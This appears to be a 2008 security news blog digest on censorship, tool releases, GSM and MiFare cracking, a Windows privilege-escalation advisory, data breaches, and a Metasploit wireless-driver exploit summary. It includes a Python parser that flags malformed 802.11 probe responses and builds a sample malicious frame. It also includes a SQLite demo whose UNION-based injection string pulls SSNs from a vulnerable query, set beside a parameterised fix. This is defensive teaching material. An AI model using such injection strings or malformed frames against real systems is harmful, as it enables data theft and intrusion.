The National Security Service (NSS) domestic intelligence agency phoned the editors of 10 daily papers on 13 April and ordered them to henceforth submit all their content for prior approval under the censorship illegally reestablished on 6 February. But the papers all refused to comply and printed their editions in the normal way. The police then went to the printers and seized copies of Ajras al-Huriyya, Rai al-Shaab and Al-Ayyam on 15 April.

The editions of Al-Sudani, al-Ahdath, Ajras al-Huriyya, Rai al-Shaab and the English-language daily The Citizen were seized the next day (yesterday) after several tens of thousands of copies had been printed. The four Arab-language dailies had been warned not to report the press conference held the day before by the editors of Ajras al-Huriyya criticising the new censorship, a local journalist told Reporters Without Borders.

One Nation Under CCTV

Tools of the Trade - Happy Birthday Edna Parker

Maybe it was a lifetime of chores on the family farm that accounts for Edna Parker's long life. Or maybe just good genes explain why the world's oldest known person will turn 115 on Sunday, defying staggering odds.

Scientists who study longevity hope Parker and others who live to 110 or beyond - they're called supercentenarians - can help solve the mystery of extreme longevity.

"We don't know why she's lived so long," said Don Parker, her 59-year-old grandson. "But she's never been a worrier and she's always been a thin person, so maybe that has something to do with it." On Friday, Edna Parker laughed and smiled as relatives and guests released 115 balloons into sunny skies outside her nursing home. Dressed in pearls, a blue and white polka dot dress and new white shoes, she clutched a red rose during the festivities. Two years ago, researchers from the New England Centenarian Study at Boston University took a blood sample from Parker for the group's DNA database of supercentenarians.

http://www.physorg.com/news127759556.html

-----------------------------------

On to the tools....

On April 19th, Filezilla 3.0.92 was released. FileZilla is a powerful FTP-client for Windows NT4, 2000 and XP. It has been designed for ease of use and with support for as many features as possible, while still being fast and reliable.

On April 18th, Adam Laurie released RFIDIOt-0.1s. RFIDIOt is an open source RFID exploration Python library and toolkit. The big news with this release is that by popular demand, there is now a separate Windows distribution.

On April 17th, Microsoft SysInternals released Process Monitor v1.32 & Process Explorer v11.13. Use Process Explorer to find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. Monitor file system, Registry, process, thread and DLL activity in real-time with Process Monitor.

On April 12th, KeePass v1.11 was released. KeePass is a free/open-source password manager or safe which helps you to manage your passwords in a secure way. Check the press release for all the change details.

On April 11th, Paint.NET 3.30 was released. Paint.NET is image and photo manipulation software designed to be used on computers that run XP, Server 2003 or Vista.

On April 9th, Adobe Systems released Flash Player v9.0.124.0. This release addressed several security vulnerabilities.

On April 2nd, Mozilla released Firefox 3 Beta 5. Improvements to the JavaScript engine as well as profile guided optimizations have resulted in continued improvements in performance. Compared to Firefox 2, web applications like Google Mail and Zoho Office run twice as fast in Firefox 3 Beta 5.

On March 31st, Pidgin 2.4.1 was released. Pidgin is a multi-protocol Instant Messaging client that allows you to use all of your IM accounts at once. Check out the changelog for all the details.

On March 30th, Wireshark 1.0.0 was released. Wireshark (formerly Ethereal) is a network protocol analyzer for Unix and Windows. This new release addresses several DoS vulnerabilities.

On March 28th, Nullsoft released Winamp 5.53. Check the version history for all the changes.

On March 27th, The Honeynet Project and School of Mathematics, Statistics and Computer Science at Victoria University of Wellington released Capture-HPC v2.1. Capture-HPC is an innovative security product that is able to find and investigate the increasing problem of client-side computer attacks. This new software release increases the features and speeds performance allowing anyone to investigate a larger range and quantity of client-side computer attacks. It is written and distributed under the GNU General Public License, v2.

On March 26th, GNU Privacy Guard released GnuPG 1.4.9 & GnuPG 2.0.9. This is a maintenance release to fix a possible vulnerability introduced with 1.4.8.

The Sim Toolkit Research Group

THC is proud to announce the SIM Toolkit Research Project. We are looking for talented people. The goal is to uncover secrets of the SIM card and learn how it really works.

http://wiki.thc.org/gsm/simtoolkit

GSM Cracking: Coming Soon to a Computer Near You via a Web Service

Via O'Reilly Radar -

A web service that will make it easy and inexpensive to crack the GSM A5/1 encryption protocol, quickly enough for a call that is still in progress, is slated to launch at the end of April. Living right at the intersection of open hardware, open source software, software as a service, and cryptography, the service will reduce the cost and effort of cracking GSM call encryption by at least an order of magnitude.

The service is being developed by members of the GSM Software Project and demonstrates just how much things have changed in the world since the GSM system was designed. Various approaches to cracking both A5/1 (the European standard) and A5/2 (the weaker US standard) have been available for some time but this one is unique in that it should be available to researchers and hackers at the end of April in hosted API form instead of PDF.

China Tries to Limit Internet Vitriol Toward the West

Via LATimes.com -

As Chinese nationalism flares across cyberspace, the government is growing concerned that passions could spill over into the real world, and that anger directed against foreigners could turn inward. Critics contend that Beijing has had a role in fanning the xenophobic sentiment to counter international condemnation of its crackdown on Tibetan rioters, but now Chinese officials appear to be trying to rein in the vitriol.

Chinese censors have quietly warned cyber-police and Internet businesses to delete all information related to protests against Western policies, nations or companies that have proliferated in the wake of demonstrations surrounding the global Olympic torch relay and high-level calls to boycott the opening ceremony of the Summer Games in Beijing.

The notice issued this week by China's "Internet Inspection Sector" instructs recipients to reset the keywords used to block access to certain websites, relay the instructions through all Internet distribution channels and delete the notice in a timely manner.

The censors' notice cites the danger that Internet-fueled emotions could lead to unrest. "Internet users are in a most intense mood toward Western countries," it said. "Such information has shown a tendency to spread and, if not checked in time, could even lead to events getting out of control as they did with the April 9 incident against Japan."

That was a reference to April 2005, when demonstrators attacked Japan's embassy in Beijing and consulate in Shanghai, burned Japanese goods and beat Japanese citizens because of Tokyo's bid to join the U.N. Security Council and over Japanese textbooks that downplayed Tokyo's World War II aggression.

Notorious eBay Hacker Arrested in Romania

Via The Register UK -

Vladuz, the notorious hacker who repeatedly accessed off-limits parts of eBay's network and then publicly bragged about it, has been arrested, the online auctioneer says.

The hacker was arrested by Romanian law enforcement officials with the help of the US Secret Service, the FBI and eBay's global fraud investigation team, eBay said. The company wouldn't discuss additional details, and representatives from the Secret Service and the FBI couldn't be reached for comment.

According to Romanian news reports here and here, Vlad Constantin Duiculescu, 20, was arrested in a communist-era housing project in Bucharest. A court in that city remanded the suspect in custody for an initial 29 days.

'Judicial Scandal' in Pirate Bay Case

Via thelocal.se (Sweden) -

A Swedish police officer involved in the investigation of file sharing site The Pirate Bay has been given a job with one of the plaintiffs in the case, film company Warner Brothers.

The officer began working for Warner Brothers several months after the preliminary investigation was completed. The same police officer is scheduled to appear as a witness in the forthcoming Pirate Bay trial, newspaper Sydsvenskan reports.

Defence lawyer Peter Althin said he would be looking into the matter.

"The question is how long this was under consideration. If it was under consideration at the time of the investigation then it is a scandal," he told Sydsvenskan.

Althin is representing Peter Sunde, one of four men charged with being an accessory to breaking copyright law.

"This is a judicial scandal. Talk about a conflict of interests," Sunde told the newspaper.

If the police officer is found to have entered into discussions with Warner Brothers before the end of the investigation, which took a year and a half to complete, it is possible that the prosecution will have to scrap its findings and start again, said Althin.

Token Kidnapping: New Windows Kernel Bug Released in HITB

http://conference.hitb.org/hitbsecconf2008dubai/?page_id=182

Presentation Title: Token Kidnapping

Presentation Details:
This presentation is about a new technique for elevating privileges on Windows, mostly from services. The technique exploits design weaknesses in Microsoft Windows XP, 2003, Vista and even Windows 2008. While many new security protections have been added in Windows Vista and 2008, because of these weaknesses some of the new protection mechanisms are almost useless.


It will be explained how it's possible in Windows XP and 2003 to elevate privileges to LOCAL SYSTEM from any process that has impersonation rights, and in Windows Vista and Windows 2008 how to elevate privileges to LOCAL SYSTEM from processes running under the NETWORK SERVICE and LOCAL SERVICE accounts, demonstrating that running code under NETWORK SERVICE or LOCAL SERVICE is nonsense since it's always possible to end up running code under the LOCAL SYSTEM account. 0day code for elevating privileges in SQL Server and Internet Information Services will be shown.

-----------------------

Compare that to the Windows Advisory release.

Sounds right on the money.

Thanks to K for the heads up.

UPDATE (4/19/2008) 2:23PM CST - Cesar posted the following message on several mailing lists today.

Token Kidnapping (Microsoft Security Advisory 951306) presentation available

Presentation is available at:
http://www.argeniss.com/research/TokenKidnapping.pdf

Exploit code won't be released for a while due to
Microsoft request.

Enjoy.

Cesar.

Friday, April 18, 2008

European Union Tightens Anti-Terrorism Laws

Via BBC -

European Union ministers have agreed to punish incitement to terrorism through the internet.

At a meeting in Luxembourg, EU justice and interior ministers tightened existing laws.

Public provocation to commit terrorist attacks, as well as recruiting and training people for terrorism will be punishable offences throughout the EU.

The ministers also agreed on an action plan to prevent terrorist groups from getting explosives.

EU officials said the decision to punish propaganda, recruitment and training for terrorism through the internet filled an important gap in European legislation.

They described the internet as a virtual training camp for militants, used to inspire and mobilise local groups.

Earlier this month, the EU anti-terrorism co-ordinator, Gilles de Kerchove, said the threat of terrorism in Europe had not diminished and about 5,000 internet sites were being used to radicalise young people.

National courts will now be able to ask internet service providers to remove such sites.

Britain, Spain and Italy already punish public incitement to terrorism.

But under pressure from Nordic countries and civil rights campaigners, ministers made clear that the new provisions may not be used to restrict freedom of expression.

In a separate move to combat terrorism, they agreed to establish an early-warning system on stolen explosives and detonators by the end of the year.

UK Police to Hold Suspect Arrested Under the Terrorism Act

Via BBC -

Police in Bristol have been granted a further seven days to question a 19-year-old man arrested under the Terrorism Act.

The extension comes after Avon and Somerset police conducted a controlled explosion early Friday in a cul-de-sac in the Westbury-on-Trym area.

Bomb disposal units returned to the area late Friday.

The suspect was named as Andrew Ibrahim, a British Muslim convert who moved into the area three weeks ago.

The controlled blast was carried out after a raid on the suspect's home in the immediate area.

The materials blown up are to be analysed as part of what police described as a "long and complex" investigation, sparked by an intelligence tip-off.

Residents were evacuated and some were expected to be kept out of their homes until at least Saturday.

Vulnerability in Windows Could Allow Elevation of Privilege

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
Published: April 17, 2008

Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2 and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.

Currently, Microsoft is not aware of any attacks attempting to exploit the potential vulnerability. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs.

U.S. to Expand Collection Of Crime Suspects' DNA

Via Washington Post -

The U.S. government will soon begin collecting DNA samples from all citizens arrested in connection with any federal crime and from many immigrants detained by federal authorities, adding genetic identifiers from more than 1 million individuals a year to the swiftly growing federal law enforcement DNA database.

The policy will substantially expand the current practice of routinely collecting DNA samples from only those convicted of federal crimes, and it will build on a growing policy among states to collect DNA from many people who are arrested. Thirteen states do so now and turn their data over to the federal government.

The initiative, to be published as a proposed rule in the Federal Register in coming days, reflects a congressional directive that DNA from arrestees be collected to help catch a range of domestic criminals. But it also requires, for the first time, the collection of DNA samples from people other than U.S. citizens and legal permanent residents who are detained by U.S. authorities.

Although fingerprints have long been collected for virtually every arrestee, privacy advocates say the new policy expands the DNA database, run by the FBI, beyond its initial aim of storing information on the perpetrators of violent crimes.

They also worry that people could be detained erroneously and swept into the database without cause, and that DNA samples from those who are never convicted of a crime, because of acquittal or a withdrawal of charges, might nonetheless be permanently retained by the FBI.

"Innocent people don't belong in a so-called criminal database," said Tania Simoncelli, science adviser for the American Civil Liberties Union. "We're crossing a line."

She said that if the samples are kept, they could one day be analyzed for sensitive information such as diseases and ancestry.

Justice Department spokesman Erik Ablin said the collection of DNA samples "will provide an additional form of biometric identification from persons who would normally be fingerprinted." FBI rules preclude using DNA samples to determine a person's genetic traits, diseases or disorders.

The database expansion was authorized by Congress as an amendment to the Violence Against Women Act and was billed primarily as a way to track down serial rapists, murderers and other offenders. "We know for a fact that the proposed regulations will save the lives of many innocent people and will prevent devastating crimes," said Sen. Jon Kyl (R-Ariz.), a sponsor of the legislation. "These regulations are long overdue -- we should have done this 10 years ago."

The proposed rule applies to all federal agencies with the authority to arrest or detain, including the FBI, the Border Patrol and the Internal Revenue Service. Although details of the policy have not been announced, officials said they expect the bulk of the new DNA samples to be collected through cheek swabs.

-----------------------

So NASA, the IRS and the TSA at the airport can take my DNA?

I wonder if this is going in the Server in the sky?

Wow...bring on the CCTVs.

Information on Thousands of UM Patients Stolen

Via Miami Herald.com -


Computer tapes containing confidential information on 2.1 million University of Miami patients were stolen last month when thieves took a case out of a van used by a private off-site storage company, UM said Thursday morning.

"Anyone who has been a patient of a University of Miami physician or visited a UM facility since Jan. 1, 1999, is likely included on the tapes," the university said in a news release. "The data included names, addresses, Social Security numbers or health information. The university will be notifying by mail the 47,000 patients whose data may have included credit card or other financial information regarding bill payment."

The information was in a container holding computer back-up tapes. The container was removed from a vehicle in downtown Coral Gables on March 17, the storage company told UM.

"Shortly after learning of the incident, the university determined it would be unlikely that a thief would be able to access the backup tapes because of the complex and proprietary format in which they were written," UM said in the statement.

"Even so, the university engaged leading computer security experts at Terremark Worldwide to independently ascertain the feasibility of accessing and extracting data from a similar set of backup tapes," UM reported.

A Terremark executive, Christopher Day, said that after a week of trying to extract the data, it couldn't do so. "Because of the highly proprietary compression and encoding used in writing the tapes, we were unable to extract any usable data," Day was quoted as saying in the news release.

UM then asked Alan Brill, senior managing director at Kroll Ontrack, to review the testing. "While the report shows it is not impossible to access the data, in this case there are many barriers that stand between a thief and being able to actually get usable data from the tapes," the report quoted Brill as saying.

Note that a proprietary tape format is an obscurity barrier, not encryption: it raises the effort needed to read the tapes, but as Brill's own wording concedes it does not make recovery impossible, and backup media leaving a controlled site is exactly the case that encryption of data at rest is meant for.

In its release, UM said it has created a website for information about the incident: www.dataincident.miami.edu. Patients can also contact a call center at 1-866-628-4492.

Massive Botnets Decried As Imminent National Threat

Via Wired.com -

Gangs of thousands of zombie home computers grinding out spam, committing fraud and overpowering websites are the most vexing net threat today, according to law enforcement and security professionals.

Today's botnet herders have hundreds of thousands of computers at their command and use technically sophisticated ways to hide their headquarters, making it easy for them to make millions from spam and credit card theft. They can also be used to direct floods of fake traffic at a targeted website in order to bring down a rival, extract protection money or less frequently, used to make a political point in the case of attacks on Estonia and the Church of Scientology.

Security pros and government officials are now describing the latter attacks, known as Distributed Denial of Service attacks, as serious threats to national security -- turning packet floods against public websites into the latest face of "cyberwar" hysteria.

Hence, the appearance Tuesday of a panel discussion at the RSA 2008 security conference entitled "Protecting the Homeland: Winning the Botnet Battle," which was marked by a mix of resignation, indignation and post-9/11 rhetoric.

Ronald Teixeira, the executive director of the non-profit National Cyber Security Alliance and the panel's moderator, began the discussion by describing botnets as "one of the largest threats we face on the internet today, and they can be used to attack critical infrastructure."

The Department of Homeland Security's representative Jordana Siegel, who works on public awareness at the National Cyber Security Division, echoed the line that botnets were an imminent threat to the nation's security.

Citing the attacks on Estonia last year by Russian nationalist hackers, Siegel said botnets can "disrupt an internet-reliant society," saying that the temporary takedown of Estonian newspaper and government websites "nearly crippled the country's cyber infrastructure." Earlier in the day, Homeland Security chief Michael Chertoff leaned on Estonia as evidence of the need for a federal government "Manhattan Project" for computer security.

Siegel said the DHS is working at fighting the problem, citing the annual October National Cyber Security Awareness month, which she said helped Americans learn that "all users need to practice safe online behavior."

Thursday, April 17, 2008

Intel Centrino 2200BG Wireless Driver Probe Overflow

This [Metasploit] module exploits a stack overflow in the w22n51.sys driver shipped with the Intel 2200BG integrated wireless adapter. Because the driver runs in kernel mode, the overflow gives remote code execution in kernel mode. It is triggered when an 802.11 probe response frame is received that contains multiple vendor-specific tags and a zero byte as both the ESSID and the ESSID-length element. This exploit was tested with version 8.0.12.20000 of the driver and an Intel Centrino 2200BG integrated wireless adapter. Intel provides newer versions of the w22n51.sys driver that resolve this flaw.

Since the vulnerability is triggered by probe response frames, which a card processes whether or not it is associated, every vulnerable card within radio range of the attacker is affected; the client does not need to be in any particular state for this exploit to work.

Authors: oveRet & skape

http://www.milw0rm.com/exploits/5461
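The trigger described above is a malformed tagged-parameter list, and the bug class behind it (trusting the length byte of an information element) is what a receiver has to guard against. The following is an added example, not code from the Metasploit module or from Intel: a bounds-checked parser for 802.11 management-frame information elements and a heuristic that flags probe responses with the shape the module describes (a zero-length SSID element plus several vendor-specific elements). The sample frame bodies, the vendor-element threshold and the function names are constructed for illustration.

```python
import struct

TAG_SSID = 0      # element ID 0: SSID
TAG_VENDOR = 221  # element ID 221 (0xdd): vendor specific

def parse_ies(body):
    """Parse a tagged-parameter list: repeated (element ID, length, data).
    The length byte is attacker-controlled, so it is checked against the
    bytes actually present before any data is sliced out."""
    ies = []
    i = 0
    n = len(body)
    while i < n:
        if i + 2 > n:
            raise ValueError("truncated element header at offset %d" % i)
        tag, length = body[i], body[i + 1]
        start, end = i + 2, i + 2 + length
        if end > n:
            raise ValueError("element %d claims %d bytes but only %d remain"
                             % (tag, length, n - start))
        ies.append((tag, bytes(body[start:end])))
        i = end
    return ies

def probe_response_ies(frame_body):
    """Skip the probe-response fixed fields (timestamp 8, beacon interval 2,
    capability 2 = 12 bytes) and parse the elements that follow."""
    if len(frame_body) < 12:
        raise ValueError("probe response body shorter than its fixed fields")
    return parse_ies(frame_body[12:])

def is_well_formed(frame_body):
    """True when every element's length byte fits inside the frame."""
    try:
        probe_response_ies(frame_body)
        return True
    except ValueError:
        return False

def suspicious_probe_response(frame_body, vendor_threshold=2):
    """Heuristic (an assumption, not taken from the module): flag a frame whose
    SSID element is empty and that carries vendor_threshold or more
    vendor-specific elements, the shape the exploit description gives."""
    ies = probe_response_ies(frame_body)
    ssid_empty = any(tag == TAG_SSID and len(data) == 0 for tag, data in ies)
    vendor_count = sum(1 for tag, _ in ies if tag == TAG_VENDOR)
    return ssid_empty and vendor_count >= vendor_threshold

def build_probe_response(ies):
    """Assemble a probe-response body from (tag, data) pairs; test helper."""
    fixed = struct.pack("<QHH", 0, 100, 0x0401)  # timestamp, interval, capability
    return fixed + b"".join(bytes([tag, len(data)]) + data for tag, data in ies)

# Constructed sample frames (not captures).
BENIGN = build_probe_response([
    (TAG_SSID, b"corpnet"),
    (1, b"\x82\x84\x8b\x96"),                        # supported rates
    (3, b"\x06"),                                    # DS parameter set, channel 6
    (TAG_VENDOR, b"\x00\x50\xf2\x02\x01\x01\x00"),   # a single WMM element
])
MALFORMED = build_probe_response(
    [(TAG_SSID, b""), (1, b"\x82\x84\x8b\x96"), (3, b"\x06")]
    + [(TAG_VENDOR, b"\x00\x50\xf2\xff" + b"\x41" * 200)] * 6)
TRUNCATED = build_probe_response([(TAG_SSID, b"corpnet")]) + b"\xdd\x40\x00\x50"

if __name__ == "__main__":
    for label, frame in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(label, "suspicious:", suspicious_probe_response(frame))
    print("truncated well-formed:", is_well_formed(TRUNCATED))
```

Real access points routinely send one or two vendor-specific elements (WMM, WPA), so the threshold is a starting point for tuning rather than a signature; what matters more is the parser's bounds check, which is the one thing the vulnerable driver evidently lacked.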

GSM Researcher Stopped at Heathrow Airport by UK Gov

Via THC Blog -

I was leaving today from the United Kingdom/Heathrow airport. I am about to speak at the HITB IT security conference about GSM security and the USRP (gnu-radio project).

I was searched by the UK government while waiting at the Gate and reading a newspaper. A UK Government employee flipped his badge and said "Let's talk. Come over here".

They detained my USRP (Software Defined Radio), my mobile phone and my personal SIM card.

They did their homework. They knew who I am, where I live, which day I speak at the conference and who I work for.

I'm involved in the GSM software project where we also developed a new attack against the GSM encryption A5/1. We published our research in February at the Blackhat security conference in Washington DC.

I understand that the government wanted to make sure that I'm not exporting any cryptanalytic device.

I did not. I will not. The USRP is a radio. My mobile phone is a normal Nokia 3310 phone and my SIM card is a SIM card.

They said they do not know what the USRP is and that I cannot take it until they have checked it in the lab. This can take 14 days (1/2 month).

So be it. They have it for 14 days. Guys, enjoy the device! It's fun playing around with it!

I'm uneasy that they took my mobile phone and my sim card. Having a pregnant wife at home and not being reachable complicates my situation.

Is this common practice? Are they allowed to do this?
Any tips on how I can get my mobile phone and my SIM card back quicker?

Our project: http://wiki.thc.org/gsm
The USRP is available from http://www.ettus.com
The GNU RADIO project: http://www.gnu.org/software/gnuradio


stunning,

THC
---

Appendix: Surprisingly they did not detain my laptop or my paperwork, which would be the most likely place to store any information related to cracking A5/1. They were also not interested in my 160GB hard drive, which would have been the obvious place for storing the rainbow tables. Neither were they interested in the high performance FPGA chip.

Instead they took all equipment that could have been used for demonstrating that GSM signals can be received with publicly available hardware for 700 USD.

It does not appear that they were after cryptanalytic information.

I received a yellow paper about my detained goods. They left the field blank that reads
"The goods specified below are detained for the following reason:". What reason?

They also crossed out the field "Agent" of the officer who was in charge of the operation.

Humor: Florida Legalizes Taking Guns To Work

Via TheOnion -

Florida legislators passed a bill allowing citizens to bring their guns to work. Here are some of the other pro-gun laws enacted recently.

  • Alaska—Members of endangered species now permitted to carry concealed firearms for self-protection
  • Louisiana—Now legal for residents to shoot at hurricanes
  • Minnesota—Any resident may fire a single shot every five years, or when Vikings win
  • Idaho—You can have a gun, or a grenade, but not both
  • Virginia—Non-gun-owning residents must apply for a permit to not own and operate a firearm
  • New York—Guest stars on Law & Order may bring their own guns to the set
  • Kansas—Children as young as 8 can bring guns to school on the condition that there's no funny business
  • Texas—That huge cattle gun used by Javier Bardem's character in No Country For Old Men now legally available at Fiesta Mart grocery stores

----------------------------

More real information on this new law passed in FL. Check out these true media sources:

http://www.tampabay.com/news/politics/state/article452031.ece

http://news.yahoo.com/s/nm/20080409/pl_nm/usa_florida_guns_dc

http://www.floridacapitalnews.com/apps/pbcs.dll/article?AID=/20080404/CAPITOLNEWS/804040350

http://www.cnsnews.com/ViewNation.asp?Page=/Nation/archive/200804/NAT20080411a.html

Interbank FX Customers Data Exposed For Almost A Year

Via Cyberinsecure.com -

In April, 2007 an employee posted a file to an insecure server that was accessible via the Internet. The file contained personal information belonging to certain persons who applied for an Interbank FX account prior to April, 2007. Interbank FX became aware of the exposure only on March 28th, 2008.

The incident involved an electronic file dated April 2, 2007, which contained personal information provided by certain individuals who had applied for an Interbank FX account prior to that date. Around that time, an employee uploaded the file to a computer server accessible via the internet. The employee’s action was contrary to Interbank FX policies and procedures and compromised the security of the information in the file.

The file contained the information provided during opening of an account. This may include social security number, driver’s license, and passport information, and may also include Interbank FX account information.

Upon learning on March 28, 2008 that this information was available outside its secured computing environment, the Company took immediate steps to secure the information. Interbank FX has thoroughly investigated the matter, has taken immediate steps to protect clients' information, and is taking additional precautions to assist in monitoring and guarding the security of personal information. All files containing sensitive personal information were removed from the server and brought within the Company's firewalls and electronic security controls.

The incident does not affect anyone who applied for an Interbank FX account after April 2, 2007.

As an additional precaution, clients are encouraged to change any password they created for their Interbank FX account prior to April 2, 2007. A toll-free hotline (800-550-1571) is available for questions and to assist in signing up for the Equifax Credit Watch program.

SQL Injection: Oklahoma Dept of Corrections

Via thedailywtf.com -

One of the cardinal rules of computer programming is to never trust your input. This holds especially true when your input comes from users, and even more so when it comes from the anonymous, general public. Apparently, the developers at Oklahoma’s Department of Corrections slept through that day in computer science class, and even managed to skip all of Common Sense 101. You see, not only did they trust anonymous user input on their public-facing website, but they blindly executed it and displayed whatever came back.

The result of this negligently bad coding has some rather serious consequences: the names, addresses, and social security numbers of tens of thousands of Oklahoma residents were made available to the general public for a period of at least three years. Up until yesterday, April 13 2008, anyone with a web browser and the knowledge from Chapter One of SQL For Dummies could have easily accessed – and possibly, changed – any data within the DOC’s databases.
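The bug class described above in its smallest form, as an added example (not the Oklahoma DOC's code, which was never published): a name lookup that splices the user's search string into the SQL text, beside the parameterised version of the same query. The table, the rows and the attack string are constructed for illustration and live in an in-memory SQLite database.

```python
import sqlite3

# Constructed sample rows standing in for a records database; not real people.
SAMPLE_ROWS = [
    ("John Doe", "1 Main St, Tulsa", "123-45-6789"),
    ("Jane Roe", "9 Elm Ave, Norman", "987-65-4321"),
]

def build_db():
    """Create an in-memory database. The public page is meant to show only
    name and address; the ssn column must never reach the browser."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE offenders (name TEXT, address TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO offenders VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn

CONN = build_db()

def lookup_vulnerable(name, conn=CONN):
    """The bug: the search string is spliced into the SQL text, so a quote in
    the input ends the string literal and the rest of the input becomes SQL."""
    sql = "SELECT name, address FROM offenders WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(name, conn=CONN):
    """The fix: a parameterised query. The value travels to the engine
    separately from the statement text, so it is only ever compared, never parsed."""
    sql = "SELECT name, address FROM offenders WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()

# Hypothetical attack string: closes the literal, appends a UNION that reads
# the ssn column into the address position, and comments out the trailing quote.
ATTACK = "x' UNION SELECT name, ssn FROM offenders --"

if __name__ == "__main__":
    print("vulnerable:", lookup_vulnerable(ATTACK))
    print("safe:      ", lookup_safe(ATTACK))
```

With the attack string the vulnerable lookup returns every name paired with its Social Security number, while the parameterised lookup returns nothing, because no row is literally named `x' UNION SELECT ...`. SQLite's `execute()` refuses to run more than one statement per call, so a stacked `'; UPDATE ...` would fail here; drivers for SQL Server and other engines accept batches, which is why the article's "possibly changed" is not an exaggeration.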

Wednesday, April 16, 2008

Malicious Microprocessor Opens Doors for Attack

Via Networkworld -

For years, hackers have focused on finding bugs in computer software that give them unauthorized access to computer systems, but now there's another way to break in: Hack the microprocessor.

On Tuesday, researchers at the University of Illinois at Urbana-Champaign demonstrated how they altered a computer chip to grant attackers back-door access to a computer. It would take a lot of work to make this attack succeed in the real world, but it would be virtually undetectable.

To launch its attack, the team used a special programmable processor running the Linux operating system. The chip was programmed to inject malicious firmware into the chip's memory, which then allows an attacker to log into the machine as if he were a legitimate user. To reprogram the chip, researchers needed to alter only a tiny fraction of the processor circuits. They changed 1,341 logic gates on a chip that has more than 1 million of these gates in total, said Samuel King, an assistant professor in the university's computer science department.

"This is like the ultimate back door," said King. "There were no software bugs exploited."

King demonstrated the attack on Tuesday at the Usenix Workshop on Large-Scale Exploits and Emergent Threats, a conference for security researchers held in San Francisco.

His team was able to add the back door by reprogramming a small number of the circuits on a LEON processor running the Linux operating system. These programmable chips are based on the same Sparc design that is used in Sun's midrange and high-end servers. They are not widely used, but have been deployed in systems used by the International Space Station.

In order to hack into the system, King first sent it a specially crafted network packet that instructed the processor to launch the malicious firmware. Then, using a special login password, King was able to gain access to the Linux system. "From the software's perspective, the packet gets dropped... and yet I have full and complete access to this underlying system that I just compromised," King said.

Russian Gov Enacts Byzantine WiFi Regulations

Via arstechnica.com -

It is often said that the opposite of progress is paperwork. The incomprehensibly self-defeating wastefulness and inefficiency of the legislatosaurus never ceases to depress me, but for once, America's idiocracy has been outdumbed by a Russian government agency which has proposed one of the most breathtakingly inane policies that I have ever had the misfortune of witnessing: mandatory registration of all WiFi devices.

According to Fontanka.ru, a Russian news source, the government agency responsible for regulating mass media, communications, and cultural protection has stated that users will have to register every WiFi-enabled device with the government and receive special permission in order to use the hardware. The agency says that registration could take as long as ten days for standard devices like PDAs and laptops and that it intends to confiscate devices that are used without registration. Users who wish to operate a wireless access point or WiFi-enabled home router are expected to go through an even more onerous process that will involve submitting documentation and obtaining a license. In certain regions, like Moscow and St. Petersburg, users will also have to receive special approval from the Federal Security Service.

The policy, which was explained to Fontanka.ru by the Russian agency's deputy director Vladimir Karpov, could reverse existing policies like a 2004 government panel decision to provide blanket permission for indoor wireless access point operation and a 2007 policy which allowed use of mobile WiFi devices without registration. According to The Other Russia, which provides an overview of the Fontanka.ru article in English as well as some additional details, the Russian government agency which is responsible for issuing the new policy was created when the Russian media and telecommunications regulatory bodies were merged last year.

The policy would likely be impossible to enforce and some question whether the government agency even has the authority to enforce it. WiFi technology is a powerful enabler of mobile connectivity and technological innovation. If regulatory policies broadly erode the availability of connectivity, the results could be disastrous for Russia's tech-savvy population. The policy reflects an abysmal understanding of WiFi's pervasiveness and utility and seems like an arbitrary bureaucratic decision with no inherent purpose. Perhaps in Russia, unregulated WiFi is one of those accoutrements of capitalist imperialism that must be opposed with vigorous shoe-banging and similarly vigorous legislative action.

The Fontanka.ru article quotes an industry specialist who points out that the government agency behind the policy is run by a former metallurgic engineer who likely has no clue about many of the technical issues overseen by his organization. In this respect, Russia has much in common with the US, where lack of relevant experience often seems to be a prerequisite for public office, especially when it comes to regulating the series of tubes that make up the interwebs.

Merck Busted For Ghostwriting Vioxx Studies

Via injuryboard.com -

Drug maker, Merck & Co., has always characterized its conduct as above board and ethically appropriate among pharmaceutical companies.

“We employ rigorous scientific methods to design, conduct, analyze, and report results of clinical trials in the development of innovative drugs and vaccines, with a focus on meeting unmet medical needs and with an ethic that puts the interests of the patient first.”

That's what the company says in a 2002 paper titled "The practices of Merck & Co."

But what really goes on is another story.

Authors writing in this week’s issue of The Journal of the American Medical Association (JAMA) reveal how Merck manipulated dozens of publications to promote one of its products, ironically the painkiller Vioxx (rofecoxib).

Based on internal company documents revealed in Vioxx litigation, JAMA authors uncover how the company, without disclosing it, compensated ghostwriters who aren’t even doctors, to create articles for professional journals that have the potential to influence doctors and popularize drugs prescribed to the public.

In the 250 documents reviewed by the authors, Merck employees either working by themselves or in collaboration with a medical publishing company helped create the study on Vioxx.

They would then recruit academics or leaders in the medical field to lend their name as the lead author.

For scientific review papers, Merck would outline the plan for the manuscript then ghostwriters were hired from medical publishing companies, which typically pay about $20,000 per submission to the ghostwriter.

The scientist then recruited to be the named author would be offered “honoraria” for their participation.

This review in JAMA finds that among 96 published articles, 92 percent of clinical trials disclosed Merck’s financial support. But only half disclosed Merck’s involvement in the creation of the publication or whether the author had received compensation.

MiFare RFID Crack Takes Just Seconds

Via Computerworld -

The ubiquitous MiFare Classic RFID chip -- used daily by millions worldwide in access control keys, subway passes and other applications -- is even easier to crack than previously thought, according to security researchers who announced the development Tuesday at EuroCrypt, an international cryptography conference in Istanbul.

Mere seconds are all that is required to crack the chip's security -- not a few hours, as estimated last month. Karsten Nohl, a computer science graduate student and one of the masterminds behind reverse-engineering MiFare security, said in an interview that it now takes only 12 seconds to recover the key on a MiFare Classic card on an ordinary laptop.

